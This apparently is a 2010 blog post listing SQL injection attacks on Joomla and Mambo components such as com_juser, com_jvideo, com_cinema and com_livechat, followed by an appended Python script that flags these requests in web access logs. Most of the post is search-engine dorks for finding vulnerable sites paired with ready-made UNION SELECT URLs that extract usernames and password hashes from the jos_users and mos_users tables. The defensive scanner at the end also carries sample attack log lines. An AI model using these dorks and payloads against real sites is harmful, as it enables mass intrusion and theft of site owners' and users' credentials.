Joomla SQL injection vulnerabilities!!!

Date: 2010-04-24 / Category: Security Zone

Joomla Live Chat

Dork:
allinurl:option=com_livechat

Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0×3a,password))),3,4+from+jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(username,0×3a,password))),3+from+jos_users

Joomla “option=com_juser”

Example:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]

Dork:
inurl:option=com_juser

exploit:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users–

Joomla “com_jvideo”

Example:
http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]

Dork :
inurl:option=com_jvideo
inurl:com_jvideo

exploit:
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat
(username,0×3a,password)+from+jos_users

Joomla com_ewriting

Dorks:
allinurl:”com_ewriting”

Exploit :
Joomla!
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10+FROM+jos_users–

Mambo
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10+FROM+mos_users–

Joomla com_simple_review Sql injection

Dork:
inurl:”com_simple_review”

Exploit:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws
(username,0×3a,password),2+from+jos_users–

Joomla Qur’an component

DORK :
inurl:”/index.php?option=com_quran”
allinurl:”com_quran”

Exploit :

Mambo
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+mos_users+limit+0,20–

Joomla
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+jos_users+limit+0,20–

Joomla Component com_cinema SQL Injection

DORK
allinurl: “com_cinema”

EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,concat(username,0×3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,
concat(username,0×3a,password)/**/from/**/jos_users/*

Joomla Component joomradio Remote SQL Injection

DORK:
inurl:com_joomradio

Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0×3a,password),user(),user(),user(),user(),user() FROM jos_users–
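
Seen from the defender's side, every request above has the same shape: a `UNION SELECT` placed in a component parameter and reading from `jos_users` or `mos_users`, with `+`, `%20` or `/**/` standing in for spaces. The following is an added example, not part of the original post, that flags that shape in web access logs; it assumes combined-format log lines, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
USERS_TABLE = re.compile(r"\bfrom\s+(?:jos|mos)_users\b")  # default Joomla / Mambo prefixes
COMPONENT = re.compile(r"\bcom_\w+")


def normalize(query):
    """Undo the separators used in the requests: '+', %20 and inline comments."""
    text = unquote_plus(unquote_plus(query))  # second pass catches double encoding
    text = SQL_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()


def classify(log_line):
    """Return (component, finding) for a suspicious request line, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    text = normalize(url.query)
    if not UNION_SELECT.search(text):
        return None
    component = COMPONENT.search(url.path.lower() + " " + text)
    finding = "credential-dump" if USERS_TABLE.search(text) else "union-select"
    return (component.group(0) if component else "unknown", finding)


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_juser&task=show_profile&id=70 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Apr/2010:10:00:05 +0000] "GET /index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)+from+jos_users-- HTTP/1.1" 200 5301',
    '198.51.100.7 - - [24/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_cinema&func=detail&id=-1/**/UNION/**/SELECT/**/1,2/**/FROM/**/jos_users/* HTTP/1.1" 200 4410',
    '198.51.100.7 - - [24/Apr/2010:10:00:12 +0000] "GET /administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,2,3,4%20from%20mos_users HTTP/1.1" 200 312',
    '198.51.100.7 - - [24/Apr/2010:10:00:15 +0000] "GET /index.php?option=com_jvideo&view=user&user_id=62+UNION+ALL+SELECT+version() HTTP/1.1" 200 2201',
]


def scan(lines):
    """Return (line_index, (component, finding)) for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines) if (hit := classify(line))]


if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(number, *hit)
```

A site that uses a non-default table prefix only reaches the `union-select` finding, so both findings are worth triage.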
